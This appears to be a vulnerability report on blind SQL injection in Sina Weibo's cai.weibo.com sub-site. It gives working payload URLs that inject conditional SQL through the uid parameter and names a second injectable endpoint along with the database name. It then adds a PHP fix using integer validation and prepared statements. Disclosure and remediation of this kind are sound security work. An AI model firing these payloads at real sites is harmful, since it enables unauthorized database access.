Multiple blind SQL injection points on a Sina Weibo sub-site
Injection point 1:
http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=1%29,1,%28select%201%20union%20select%202%29%29
http://cai.weibo.com/pc.php/index/user?type=user&uid=10057693%20and%20if%28%281=2%29,1,%28select%201%20union%20select%202%29%29
A quick test shows that database() returns jcsport; nothing else was tested.
Other injection points:
http://cai.weibo.com/pc.php/api/user/matchbet?page=1&size=10&uid=10057693&type=rooms&datetype=1
Injection via the uid parameter


Fix:
Filter the input.
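As an added example (not code from the report or from the site), here is how the uid parameter could be handled so that the appended SQL fragment in the URLs above is never interpreted: validate it as an integer and bind it through a prepared statement. The table and column names, the PDO DSN and the credentials are assumptions.

```php
<?php
// Added example, not the site's own code. Table/column names, DSN and
// credentials are assumptions; only the database name (jcsport) is from the report.

// The pattern the report's payloads rely on: the raw GET value is pasted
// into the SQL text, so "10057693 and if((1=2),1,(select 1 union select 2))"
// becomes part of the query. The false branch returns two rows and errors,
// which is the yes/no oracle the two URLs demonstrate.
//   $sql = "SELECT uid, name FROM user WHERE uid = " . $_GET['uid'];   // vulnerable

function fetchUser(PDO $db, $rawUid): ?array
{
    // Reject anything that is not a plain positive integer before it reaches MySQL.
    $uid = filter_var($rawUid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        http_response_code(400);
        return null;
    }

    // Bound parameter: the value travels separately from the SQL text,
    // so it can only ever be compared as a number.
    $stmt = $db->prepare('SELECT uid, name FROM user WHERE uid = :uid');
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO(
    'mysql:host=localhost;dbname=jcsport;charset=utf8mb4',   // assumed DSN
    'DB_USER_PLACEHOLDER',
    'DB_PASSWORD_PLACEHOLDER',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // native server-side prepared statements
    ]
);

$user = fetchUser($db, $_GET['uid'] ?? '');
```

The same treatment applies to the uid parameter of the matchbet endpoint; with the integer check in front, the "and if(...)" suffix is rejected with a 400 before any query runs.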